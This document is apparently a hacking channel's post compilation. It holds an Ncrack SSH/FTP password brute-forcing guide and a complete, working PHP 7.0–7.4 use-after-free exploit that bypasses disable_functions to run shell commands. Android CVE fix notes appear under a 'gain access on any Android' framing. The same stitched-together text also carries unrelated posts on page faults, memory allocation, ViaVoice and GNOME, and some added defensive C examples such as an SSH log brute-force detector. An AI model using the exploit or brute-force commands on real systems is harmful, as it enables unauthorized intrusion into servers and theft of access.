▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
🦑 Top cracking tool: how to use the Ncrack tool
🦑 LET'S START:
Ncrack is frequently used in hacking FTP and SSH servers. Hackers love it because it is much faster and more accurate than Hydra.
How to:
(clone https://github.com/nmap/ncrack)
1) This is the key command for using Ncrack to crack SSH passwords:
ncrack -p 22 --user admin -P pass.txt 192.168.1.1 -vv
2) -p 22 is the port of your target. Since we are targeting SSH, we write 22, because SSH uses port 22 in most cases.
3) --user admin is used because, in this example, we already know the username of our target.
4) -P pass.txt is used because we don't know the password yet (of course!); this is where we put our wordlist.
5) 192.168.1.1 is where you put the IP address of your target.
6) -vv makes the tool verbose, showing what it is doing in the background while it searches for the password.
7) If you are trying this against FTP, just change port 22 to 21, because FTP uses port 21 in most cases.
8) Well done!
@UndercOdeTesting
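What a run of the command above leaves behind on the server, as an added example that is not part of the original post: one source address produces a burst of password failures for a single account. The sketch assumes OpenSSH's "Failed password for ... from ... port ..." auth-log message; the function names, the threshold of 5 and the sample log lines are constructed for illustration.

```c
#include <stdio.h>
#include <string.h>

#define MAX_PAIRS 32

/* One (source IP, username) pair and how many password failures it produced. */
struct pair_count {
    char ip[46];
    char user[33];
    int  failures;
};

/* Extract user and source IP from an OpenSSH "Failed password" line.
 * Returns 1 on a match, 0 for every other kind of line. */
static int parse_failed_password(const char *line, char *user, char *ip)
{
    const char *p = strstr(line, "Failed password for ");
    if (p == NULL)
        return 0;
    p += strlen("Failed password for ");
    if (strncmp(p, "invalid user ", 13) == 0)   /* account does not exist */
        p += 13;
    /* Width limits keep both fields inside the caller's 33/46-byte buffers. */
    return sscanf(p, "%32s from %45s port", user, ip) == 2;
}

/* Count failures per (IP, user) over a batch of lines and copy every pair
 * that reaches `threshold` into `flagged`. Returns the number flagged. */
static size_t find_guessing_sources(const char *const *lines, size_t n,
                                    int threshold,
                                    struct pair_count *flagged,
                                    size_t max_flagged)
{
    struct pair_count seen[MAX_PAIRS];
    size_t nseen = 0, nflagged = 0;

    for (size_t i = 0; i < n; i++) {
        char user[33], ip[46];
        size_t j;

        if (!parse_failed_password(lines[i], user, ip))
            continue;
        for (j = 0; j < nseen; j++)
            if (strcmp(seen[j].ip, ip) == 0 && strcmp(seen[j].user, user) == 0)
                break;
        if (j == nseen) {
            if (nseen == MAX_PAIRS)
                continue;                       /* table full: skip new pairs */
            strcpy(seen[j].ip, ip);
            strcpy(seen[j].user, user);
            seen[j].failures = 0;
            nseen++;
        }
        seen[j].failures++;
    }
    for (size_t j = 0; j < nseen && nflagged < max_flagged; j++)
        if (seen[j].failures >= threshold)
            flagged[nflagged++] = seen[j];
    return nflagged;
}

/* Constructed sample: one host walking a wordlist against "admin", plus noise. */
static const char *const SAMPLE_LOG[] = {
    "Jan 10 03:14:01 srv sshd[4101]: Failed password for admin from 192.0.2.10 port 40112 ssh2",
    "Jan 10 03:14:01 srv sshd[4102]: Failed password for admin from 192.0.2.10 port 40114 ssh2",
    "Jan 10 03:14:02 srv sshd[4103]: Failed password for admin from 192.0.2.10 port 40120 ssh2",
    "Jan 10 03:14:02 srv sshd[4104]: Failed password for invalid user bob from 198.51.100.7 port 51000 ssh2",
    "Jan 10 03:14:03 srv sshd[4105]: Failed password for admin from 192.0.2.10 port 40126 ssh2",
    "Jan 10 03:14:03 srv sshd[4106]: Accepted password for deploy from 203.0.113.5 port 50022 ssh2",
    "Jan 10 03:14:04 srv sshd[4107]: Failed password for admin from 192.0.2.10 port 40130 ssh2",
    "Jan 10 03:14:04 srv sshd[4108]: Failed password for admin from 192.0.2.10 port 40133 ssh2",
};
#define SAMPLE_LEN (sizeof SAMPLE_LOG / sizeof SAMPLE_LOG[0])

int main(void)
{
    struct pair_count hits[4];
    size_t n = find_guessing_sources(SAMPLE_LOG, SAMPLE_LEN, 5, hits, 4);

    for (size_t i = 0; i < n; i++)
        printf("possible password guessing: %d failures for '%s' from %s\n",
               hits[i].failures, hits[i].user, hits[i].ip);
    return 0;
}
```

The counter works over whatever batch of lines it is given, so feeding it a fixed time slice of the log turns the threshold into a rate.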
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
🦑 2020 bug from a few days ago - PHP 7.0 < 7.4 (Unix) debug_backtrace disable_functions Bypass
<?php
$cmd = "id";
$n_alloc = 10; # increase this value if you get segfaults
class MySplFixedArray extends SplFixedArray {
public static $leak;
}
class Z implements JsonSerializable {
public function write(&$str, $p, $v, $n = 8) {
$i = 0;
for($i = 0; $i < $n; $i++) {
$str[$p + $i] = chr($v & 0xff);
$v >>= 8;
}
}
public function str2ptr(&$str, $p = 0, $s = 8) {
$address = 0;
for($j = $s-1; $j >= 0; $j--) {
$address <<= 8;
$address |= ord($str[$p+$j]);
}
return $address;
}
public function ptr2str($ptr, $m = 8) {
$out = "";
for ($i=0; $i < $m; $i++) {
$out .= chr($ptr & 0xff);
$ptr >>= 8;
}
return $out;
}
# unable to leak ro segments
public function leak1($addr) {
global $spl1;
$this->write($this->abc, 8, $addr - 0x10);
return strlen(get_class($spl1));
}
# the real deal
public function leak2($addr, $p = 0, $s = 8) {
global $spl1, $fake_tbl_off;
# fake reference zval
$this->write($this->abc, $fake_tbl_off + 0x10, 0xdeadbeef); # gc_refcounted
$this->write($this->abc, $fake_tbl_off + 0x18, $addr + $p - 0x10); # zval
$this->write($this->abc, $fake_tbl_off + 0x20, 6); # type (string)
$leak = strlen($spl1::$leak);
if($s != 8) { $leak %= 2 << ($s * 8) - 1; }
return $leak;
}
public function parse_elf($base) {
$e_type = $this->leak2($base, 0x10, 2);
$e_phoff = $this->leak2($base, 0x20);
$e_phentsize = $this->leak2($base, 0x36, 2);
$e_phnum = $this->leak2($base, 0x38, 2);
for($i = 0; $i < $e_phnum; $i++) {
$header = $base + $e_phoff + $i * $e_phentsize;
$p_type = $this->leak2($header, 0, 4);
$p_flags = $this->leak2($header, 4, 4);
$p_vaddr = $this->leak2($header, 0x10);
$p_memsz = $this->leak2($header, 0x28);
if($p_type == 0x6474e552) { # PT_GNU_RELRO
# handle pie
$data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
$data_size = $p_memsz;
} else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec
$text_size = $p_memsz;
}
}
if(!$data_addr || !$text_size || !$data_size)
return false;
return [$data_addr, $text_size, $data_size];
}
public function get_basic_funcs($base, $elf) {
list($data_addr, $text_size, $data_size) = $elf;
for($i = 0; $i < $data_size / 8; $i++) {
$leak = $this->leak2($data_addr, $i * 8);
if($leak - $base > 0 && $leak - $base < $text_size) {
$deref = $this->leak2($leak);
# 'constant' constant check
if($deref != 0x746e6174736e6f63)
continue;
} else continue;
$leak = $this->leak2($data_addr, ($i + 4) * 8);
if($leak - $base > 0 && $leak - $base < $text_size) {
$deref = $this->leak2($leak);
# 'bin2hex' constant check
if($deref != 0x786568326e6962)
continue;
} else continue;
return $data_addr + $i * 8;
}
}
public function get_binary_base($binary_leak) {
$base = 0;
$start = $binary_leak & 0xfffffffffffff000;
for($i = 0; $i < 0x1000; $i++) {
$addr = $start - 0x1000 * $i;
$leak = $this->leak2($addr, 0, 7);
if($leak == 0x10102464c457f) { # ELF header
return $addr;
}
}
}
public function get_system($basic_funcs) {
$addr = $basic_funcs;
do {
$f_entry = $this->leak2($addr);
$f_name = $this->leak2($f_entry, 0, 6);
if($f_name == 0x6d6574737973) { # system
return $this->leak2($addr + 8);
}
$addr += 0x20;
} while($f_entry != 0);
return false;
}
public function jsonSerialize() {
global $y, $cmd, $spl1, $fake_tbl_off, $n_alloc;
$contiguous = [];
for($i = 0; $i < $n_alloc; $i++)
$contiguous[] = new DateInterval('PT1S');
$room = [];
for($i = 0; $i < $n_alloc; $i++)
$room[] = new Z();
$_protector = $this->ptr2str(0, 78);
$this->abc = $this->ptr2str(0, 79);
$p = new DateInterval('PT1S');
unset($y[0]);
unset($p);
$protector = ".$_protector";
$x = new DateInterval('PT1S');
$x->d = 0x2000;
$x->h = 0xdeadbeef;
# $this->abc is now of size 0x2000
if($this->str2ptr($this->abc) != 0xdeadbeef) {
die('UAF failed.');
}
$spl1 = new MySplFixedArray();
$spl2 = new MySplFixedArray();
# some leaks
$class_entry = $this->str2ptr($this->abc, 0x120);
$handlers = $this->str2ptr($this->abc, 0x128);
$php_heap = $this->str2ptr($this->abc, 0x1a8);
$abc_addr = $php_heap - 0x218;
# create a fake class_entry
$fake_obj = $abc_addr;
$this->write($this->abc, 0, 2); # type
$this->write($this->abc, 0x120, $abc_addr); # fake class_entry
# copy some of class_entry definition
for($i = 0; $i < 16; $i++) {
$this->write($this->abc, 0x10 + $i * 8,
$this->leak1($class_entry + 0x10 + $i * 8));
}
# fake static members table
$fake_tbl_off = 0x70 * 4 - 16;
$this->write($this->abc, 0x30, $abc_addr + $fake_tbl_off);
$this->write($this->abc, 0x38, $abc_addr + $fake_tbl_off);
# fake zval_reference
$this->write($this->abc, $fake_tbl_off, $abc_addr + $fake_tbl_off + 0x10); # zval
$this->write($this->abc, $fake_tbl_off + 8, 10); # zval type (reference)
# look for binary base
$binary_leak = $this->leak2($handlers + 0x10);
if(!($base = $this->get_binary_base($binary_leak))) {
die("Couldn't determine binary base address");
}
# parse elf header
if(!($elf = $this->parse_elf($base))) {
die("Couldn't parse ELF");
}
# get basic_functions address
if(!($basic_funcs = $this->get_basic_funcs($base, $elf))) {
die("Couldn't get basic_functions address");
}
# find system entry
if(!($zif_system = $this->get_system($basic_funcs))) {
die("Couldn't get zif_system address");
}
# copy hashtable offsetGet bucket
$fake_bkt_off = 0x70 * 5 - 16;
$function_data = $this->str2ptr($this->abc, 0x50);
for($i = 0; $i < 4; $i++) {
$this->write($this->abc, $fake_bkt_off + $i * 8,
$this->leak2($function_data + 0x40 * 4, $i * 8));
}
# create a fake bucket
$fake_bkt_addr = $abc_addr + $fake_bkt_off;
$this->write($this->abc, 0x50, $fake_bkt_addr);
for($i = 0; $i < 3; $i++) {
$this->write($this->abc, 0x58 + $i * 4, 1, 4);
}
# copy bucket zval
$function_zval = $this->str2ptr($this->abc, $fake_bkt_off);
for($i = 0; $i < 12; $i++) {
$this->write($this->abc, $fake_bkt_off + 0x70 + $i * 8,
$this->leak2($function_zval, $i * 8));
}
# pwn
$this->write($this->abc, $fake_bkt_off + 0x70 + 0x30, $zif_system);
$this->write($this->abc, $fake_bkt_off, $fake_bkt_addr + 0x70);
$spl1->offsetGet($cmd);
exit();
}
}
$y = [new Z()];
json_encode([&$y]);
@UndercOdeOfficial
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
🦑 What can it do? (the Linux exploit code posted above):
> This exploit uses a bug in debug_backtrace() function.
> We can trick it into returning a reference to a variable that has been destroyed, causing a use-after-free vulnerability.
> The PoC was tested on various php builds for Debian/Ubuntu/CentOS/FreeBSD with cli/fpm/apache2 server APIs and found to work reliably.
(Already patched in UnderCode OS.)
@UndercOdeTesting
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
🦑 WHAT CVE OR VULNERABILITY TYPES DO YOU LIKE?
Final Results:
29% - LINUX - 2020 BUG ?
39% - Android - CVE-2020 ?
17% - WINDOWS VULNERABILITIES ?
12% - iOS BUGS-TRICKS ?
2% - MAC-Os VULNERABILITIES 2019-2020 ?
UNDERCODE COMMUNITY
So the results are for Android CVEs. Nice choices.
LET'S START
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
🦑 Two ways Linux processes allocate memory: brk() and mmap()
How can I see the number of page faults in a process?
🦑 LET'S START:
> Use the command ps -o majflt,minflt -C program to view them.
> majflt stands for major fault and minflt stands for minor fault.
> These two values represent the number of page faults that have occurred since the process was started.
🦑 What operations are performed after a page fault occurs?
When a process takes a page-fault interrupt, it traps into kernel mode, where the following operations are performed:
1) Check whether the virtual address being accessed is valid.
2) Find / allocate a physical page.
3) Fill the physical page content (read it from disk, set it directly to 0, or do nothing).
4) Establish the mapping (virtual address to physical address) and re-execute the instruction that caused the page fault.
5) If the third step requires reading the disk, the page fault is a majflt; otherwise it is a minflt.
🦑 The principle of memory allocation:
> From the operating system's perspective, there are two ways for a process to allocate memory, carried out by two system calls: brk and mmap (leaving shared memory aside).
1) brk pushes _edata, the pointer to the highest address of the data segment (.data), toward higher addresses;
2) mmap finds a free piece of virtual memory in the virtual address space of the process (between the heap and the stack, called the file mapping area).
> Both methods allocate virtual memory and do not allocate physical memory. When the allocated virtual address space is accessed for the first time, a page fault occurs, and the operating system is responsible for allocating physical memory and then establishing the mapping between virtual memory and physical memory.
> In the standard C library, the malloc / free functions are provided to allocate and free memory. Underneath, these two functions are implemented with the brk, mmap, and munmap system calls.
Written by UndercOde
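The behaviour described above can be measured directly. This added example (not from the original post) reserves pages once with brk and once with mmap and reads the process's own minflt counter before the call, after it, and after the first write to every page. The names measure and fault_report and the 2048-page size are constructed for illustration, and the code assumes Linux with glibc.

```c
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE 1   /* sbrk, madvise, MAP_ANONYMOUS on glibc */
#endif
#include <stdint.h>
#include <stdio.h>
#include <sys/mman.h>
#include <sys/resource.h>
#include <unistd.h>

enum alloc_kind { VIA_BRK, VIA_MMAP };

struct fault_report {
    long at_alloc;   /* minor faults while the kernel only handed out addresses */
    long at_touch;   /* minor faults on the first write to each page */
};

/* Minor-fault counter of this process: the value ps shows as minflt. */
static long minor_faults(void)
{
    struct rusage ru;
    return getrusage(RUSAGE_SELF, &ru) == 0 ? ru.ru_minflt : -1;
}

/* Reserve `pages` pages with brk or mmap, write one byte into each page,
 * release the memory again. Returns 0 on success, -1 on failure. */
static int measure(enum alloc_kind kind, size_t pages, struct fault_report *out)
{
    size_t page = (size_t)sysconf(_SC_PAGESIZE);
    size_t len = pages * page;
    unsigned char *p;

    long before = minor_faults();
    if (kind == VIA_BRK) {
        void *old_break = sbrk((intptr_t)len);   /* push the program break up */
        if (old_break == (void *)-1)
            return -1;
        p = old_break;
    } else {
        void *m = mmap(NULL, len, PROT_READ | PROT_WRITE,
                       MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (m == MAP_FAILED)
            return -1;
        p = m;
    }
#ifdef MADV_NOHUGEPAGE
    /* Opt out of transparent huge pages so one touched page costs one fault. */
    uintptr_t lo = ((uintptr_t)p + page - 1) & ~(uintptr_t)(page - 1);
    uintptr_t hi = ((uintptr_t)p + len) & ~(uintptr_t)(page - 1);
    if (hi > lo)
        madvise((void *)lo, hi - lo, MADV_NOHUGEPAGE);
#endif
    long after_alloc = minor_faults();

    volatile unsigned char *v = p;
    for (size_t i = 0; i < pages; i++)
        v[i * page] = 1;             /* first access: the kernel maps a page */
    long after_touch = minor_faults();

    if (kind == VIA_BRK)
        sbrk(-(intptr_t)len);        /* pull the program break back down */
    else
        munmap(p, len);

    if (before < 0 || after_alloc < 0 || after_touch < 0)
        return -1;
    out->at_alloc = after_alloc - before;
    out->at_touch = after_touch - after_alloc;
    return 0;
}

int main(void)
{
    struct fault_report r;

    if (measure(VIA_BRK, 2048, &r) == 0)
        printf("brk : %ld faults at allocation, %ld on first touch\n",
               r.at_alloc, r.at_touch);
    if (measure(VIA_MMAP, 2048, &r) == 0)
        printf("mmap: %ld faults at allocation, %ld on first touch\n",
               r.at_alloc, r.at_touch);
    return 0;
}
```

Both allocations are zero-filled anonymous memory, so every fault counted here is a minflt; a majflt needs a page that has to be read from disk.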
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
🦑 Non-technical - Controlling Linux with Language: Linux's Speech Recognition Software, in full, by UndercOde
🦑 LET'S START:
1) Linux ViaVoice requires the following machine configuration: a 16-bit sound card. ViaVoice was in fact designed and developed specifically for Red Hat, but users can run ViaVoice normally in the Red Hat environment and in other Linux versions. Of course, users may also encounter some problems during the installation process.
2) Before installing the ViaVoice speech recognition software, you must first install the Java runtime environment. ViaVoice versions were tested in a JRE-1.2.2 environment. Using the correct, older stable version can avoid incompatibilities between different JRE environments.
3) After the JRE installation is complete, put the installation disk into the CD-ROM drive and run vvsetup in the root directory, then run vvstartuser to set yourself up as a ViaVoice user and set the appropriate volume. Finally, practice repeatedly so that the software adapts to your voice. Remember that the order of installation must never be reversed.
4) "Tuning" ViaVoice: like other speech recognition software, ViaVoice, when installed for the first time, cannot recognize the user's voice very accurately. The user must "tune" it before it can recognize the user's voice.
5) One way to "tweak" ViaVoice is to read the words in the user manual over and over. For most users this is not difficult, but the words in the manual may not be ones the user uses often, so this method is not very efficient.
6) A better method is to use ViaVoice's Dictation application at work. It is written in Java. When the user dictates, some words may not be recognized correctly. When this happens, the user can correct them using the appropriate tools in Dictation. ViaVoice can then adjust the recognition tool to identify the user's voice more accurately. This method may take more effort, but similar corrections can be made with voice commands. However, please keep in mind that Dictation is not very stable.
7) An expert once said that current speech recognition software can reach a 98% accuracy rate after only 10 to 60 hours of "tuning". But so far, the results of testing ViaVoice in the Linux environment are that it is only 92% to 95% accurate, and most voice commands can be correctly recognized. Even if the user spends only a few hours practicing, the accuracy of ViaVoice improves significantly. However, users should pay special attention when using it: the pronunciation of words, the quality of the microphone and the surrounding environment all affect the accuracy of speech recognition.
8) viva voice official site http://www.vivavocesrs.com/
9) XVoice Controls Linux Desktop
> After users have completed the installation and training of ViaVoice, they can install Xvoice. Xvoice's role is to control the desktop system and application software. ViaVoice does not have these features. Users can go to xvoice.sourceforge.net to download the Xvoice software. Note that you must install the RPM in advance, because the source program requires ViaVoice in the Linux SDK to be interrupted.
10) After the installation is complete, enter xvoice m in the last window that appears, taking care not to run Dictation. At this point, the user can do a simple test: dictate the command "next window", and another window should appear on the desktop.
11) Xvoice allows users to pre-set some spoken commands for operations. A set of spoken commands is called a grammar group. Grammar groups can be associated with a specific application, window, or a module in an application, or they can be generated by context. Operations invoked by dictated commands can include keyboard strokes, mouse events, running external commands, or any combination of the three.
Written by UndercOde
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
🦑 Leverage GNOME Libraries to make writing applications easier
🦑 LET'S START:
> This application has a menu and a detachable sub-menu, as well as a status bar that displays menu hints, and it automatically stores user-defined accelerator keys (hot keys). There is a standard "About" box. In addition, all standard menu items can switch languages automatically (try "LANG=zh_TW.Big5 ./hello_world" and you will see a menu in Chinese characters).
/* Hello World (Gnome Edition)
 * Listing 1
 * This code is public domain, so use it as you please.
 * libraries that gnome needs, such as gtk, imlib, etc ...*/
#include <gnome.h>

/* this is usually defined by autoconf but we're just using simple makefiles */
#define VERSION "1.0"

/* "callback" function (signal handler) which will quit the application */
static void
exit_hello(GtkWidget *widget, gpointer data)
{
    gtk_main_quit ();
}

/* callback function for when the window closes */
static int
delete_event(GtkWidget *widget, gpointer data)
{
    gtk_main_quit ();
    return FALSE; /* false means continue with closing the window */
}

/* a callback for the about menu item, it will display a simple "About"
 * dialog box standard to all gnome applications
 */
void
about_hello(GtkWidget *widget, gpointer data)
{
    GtkWidget *box;
    const char *authors[] = {
        "James Bond",
        NULL
    };
    box = gnome_about_new(/*title: */ "Hello World (Gnome Edition)",
                          /*version: */ VERSION,
                          /*copyright: */ "(C) 1999 Secret Agents Inc.",
                          /*authors: */ authors,
                          /*other comments: */
                          "An extremely complicated application which "
                          "does absolutely nothing useful",
                          NULL);
    gtk_widget_show(box);
}

/* define the menus here */
static GnomeUIInfo file_menu [] = {
    /* some item which is not one of the standard ones, the null
     * would be the callback, however we don't want to really do anything */
    GNOMEUIINFO_ITEM_NONE("Something", "Just an item which does nothing", NULL),
    /* standard exit item */
    GNOMEUIINFO_MENU_EXIT_ITEM(exit_hello, NULL),
    GNOMEUIINFO_END
};

static GnomeUIInfo help_menu [] = {
    /* load the helpfiles for this application if available */
    GNOMEUIINFO_HELP("hello_world"),
    /* the standard about item */
    GNOMEUIINFO_MENU_ABOUT_ITEM(about_hello, NULL),
    GNOMEUIINFO_END
};

/* define the main menubar */
static GnomeUIInfo main_menu [] = {
    GNOMEUIINFO_MENU_FILE_TREE(file_menu),
    GNOMEUIINFO_MENU_HELP_TREE(help_menu),
    GNOMEUIINFO_END
};

🦑 Then:
/* Our main function */
int
main(int argc, char *argv[])
{
    GtkWidget *app; /* pointer to our main window */
    GtkWidget *w;   /* pointer to some widget */
    /* initialize gnome */
......
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
🦑 Termux-Webpentest... tool
> txtool is made to help you pentest easily in Termux.
1) git clone https://github.com/kuburan/txtool.git
2) cd txtool
3) apt install python2
4) ./install.py
5) Mtxtool
@UndercOdeTesting
🦑 2020 all Android CVE - VULNERABILITIES TO GAIN ACCESS ON ANY ANDROID:
>  CVE            References            Type  Severity  Updated AOSP versions
1) CVE-2020-0014  A-128674520           EoP   High      8.0, 8.1, 9, 10
2) CVE-2020-0015  A-139017101           EoP   High      8.0, 8.1, 9, 10
3) CVE-2019-2200  A-67319274            EoP   High      10
4) CVE-2020-0017  A-123232892 [2]       ID    High      8.0, 8.1, 9, 10
5) CVE-2020-0018  A-139945049           ID    High      8.0, 8.1, 9, 10
6) CVE-2020-0020  A-143118731           ID    High      10
7) CVE-2020-0021  A-141413692 [2] [3]   DoS   High      10
@UndercOdeOfficial
🦑 Let's start with the first Android vulnerability:
🦑 CVE-2020-0014 A-128674520 EoP High 8.0, 8.1, 9, 10:
1) RESTRICT AUTOMERGE
Make toasts non-clickable
2) Since enforcement was only on client-side, in Toast class, an app could
use reflection (or other means) to make the Toast clickable. This is a
security vulnerability since it allows tapjacking, that is, intercept touch
events and do stuff like steal PINs and passwords.
3) This CL brings the enforcement to the system by applying flag
FLAG_NOT_TOUCHABLE.
Test: atest CtsWindowManagerDeviceTestCases:ToastTest
Test: Construct app that uses reflection to remove flag FLAG_NOT_TOUCHABLE and
log click events. Then:
1) Observe click events are logged without this CL.
2) Observe click events are not logged with this CL.
Bug: 128674520
Change-Id: Ic36585bc4f186e0224f5b687c49c0b3d9266838c
(cherry picked from commit b81f269ae2afb446b9d4a909fc2bcf038af00c41)
@UndercOdeTesting
🦑 CVE-2020-0015 A-139017101 EoP High 8.0, 8.1, 9, 10
Android bug details:
1) KeyChain: Do not allow hiding Cert Install dialog
2) Do not allow apps to float a window on top of the certificate
installation / naming dialog.
3) This obscures the CA certificate installation dialog and could be used
to trick a user into installing a CA certificate.
4) This is fixed by adding the HIDE_NON_SYSTEM_OVERLAY_WINDOWS system
flag when the activity is created (onCreate), so that another activity
starting in the foreground would not be able to obscure the dialog.
Bug: 139017101
Test: Manual, with an app that floats a window.
Change-Id: Iff8e678743c3883cf1f7f64390097a768ca00856
(cherry picked from commit afdacb2ec4c5cdc2fb2a9943fa5b48100f4725c8)
@UndercOdeTesting
🦑 CVE-2020-0015 A-139017101 EoP High 8.0, 8.1, 9, 10
Android bug detail:
🦑 Revoke granted permission when the permission defining app is removed. ⚠️
> Bug: 67319274
> Test: atest android.permission.cts.RemovePermissionTest
> Change-Id: I22df546f5cd19e10045131d36dc3f5033f727baa
> Merged-In: I20c4c975a1dd41a0a6c3e068988fe60be51dd1b4
(cherry picked from commit bde381848d0d07780710ce36e0c974646ba8f995)
@UndercOdeTesting
🦑 Now Android system bugs, such as Bluetooth software bugs (Android 7-8-9)
🦑 CVE References Type Severity Updated AOSP versions
1) CVE-2020-0022 A-143894715 DoS Moderate 10
> GAP: Correct the continuous pkt length in l2cap
L2cap continuous pkt length wrongly calculated in
reassembly logic when remote sends more data
than expected.
Wrong pkt length leading to memory corruption
Hence the Correct the continuous pkt length in
l2cap reassembly logic.
Bug: 135239489
Bug: 143894715
CRs-Fixed: 2434229
Test: make and internal testing
Change-Id: I758d9e31465b99e436b9b1841320000f08186c97
Merged-In: I758d9e31465b99e436b9b1841320000f08186c97
(cherry picked from commit 337bd4579453bd6bf98ff519de3ac1019cd30d28)
(cherry picked from commit 602f4b44fe30ec8b225e1cee5f96817607d93e5a)
2) RCE Critical 8.0, 8.1, 9
CVE-2020-0023 A-145130871 ID Critical 10
>Enforce BLUETOOTH_PRIVILEGED in setPhonebookAccessPermission
Bug: 145130871
Test: POC
Merged-In: Ib4985e18de9f6695acc371da78deb240d42671f1
Change-Id: I3b8897166e223179fcbcf8c7a64e0c4d4ca974ef
(cherry picked from commit 8d1e8979f56acfe477bd3b84994a716a8391a8eb)
3) CVE-2020-0005 A-141552859 EOP High 8.0, 8.1, 9, 10
4) CVE-2020-0026 A-140419401 EoP High 8.0, 8.1, 9, 10
5) CVE-2020-0027 A-144040966 EoP High 8.0, 8.1, 9, 10
6) CVE-2020-0028 A-122652057 [2] ID High 9
🦑 We hope that after all these bugs, and more coming for Android, you have figured out the meaning of "NOTHING SAFE".
🦑 If you have any doubts, feel free to ask us.
@UndercOdeTesting
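A simplified model of the reassembly length clamp that the CVE-2020-0022 commit message above describes, added here as an example; it is not the AOSP code and not part of the original post. `struct reasm`, `HDR_LEN` and the function names are constructed, and the specific miscalculation shown (mixing header-inclusive and payload-only lengths) is an assumption about how such an error can arise, not taken from the patch.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define HDR_LEN 4u            /* constructed per-fragment header size */
struct reasm {
    uint8_t buf[64];          /* reassembly buffer */
    size_t  total;            /* payload length announced by the first fragment */
    size_t  have;             /* payload bytes collected so far */
};

/* Miscalculated clamp, for contrast: the clamped value is a payload count,
 * but it is stored in the header-inclusive length and HDR_LEN is subtracted
 * again, so the result wraps when fewer than HDR_LEN bytes remain. */
static size_t naive_copy_len(const struct reasm *r, size_t frag_len)
{
    size_t remaining = r->total - r->have;
    if (frag_len - HDR_LEN > remaining)
        frag_len = remaining;
    return frag_len - HDR_LEN;
}

/* Corrected clamp: validate state, convert to payload units once, then
 * cap at what the announced length still allows. */
static size_t safe_copy_len(const struct reasm *r, size_t frag_len)
{
    if (frag_len < HDR_LEN || r->total > sizeof r->buf || r->have > r->total)
        return 0;
    size_t payload = frag_len - HDR_LEN;
    size_t remaining = r->total - r->have;
    return payload < remaining ? payload : remaining;
}

/* Append a continuation fragment; returns the number of payload bytes kept. */
static size_t reasm_append(struct reasm *r, const uint8_t *frag, size_t frag_len)
{
    size_t n = safe_copy_len(r, frag_len);
    if (n) memcpy(r->buf + r->have, frag + HDR_LEN, n);
    r->have += n;
    return n;
}

int main(void)
{
    struct reasm r = { .total = 10, .have = 8 };   /* constructed: 2 bytes missing */
    uint8_t frag[HDR_LEN + 6] = { 0, 0, 0, 0, 'A', 'B', 'C', 'D', 'E', 'F' };
    printf("naive length: %zu\n", naive_copy_len(&r, sizeof frag));
    printf("safe length:  %zu\n", reasm_append(&r, frag, sizeof frag));
    return 0;
}
```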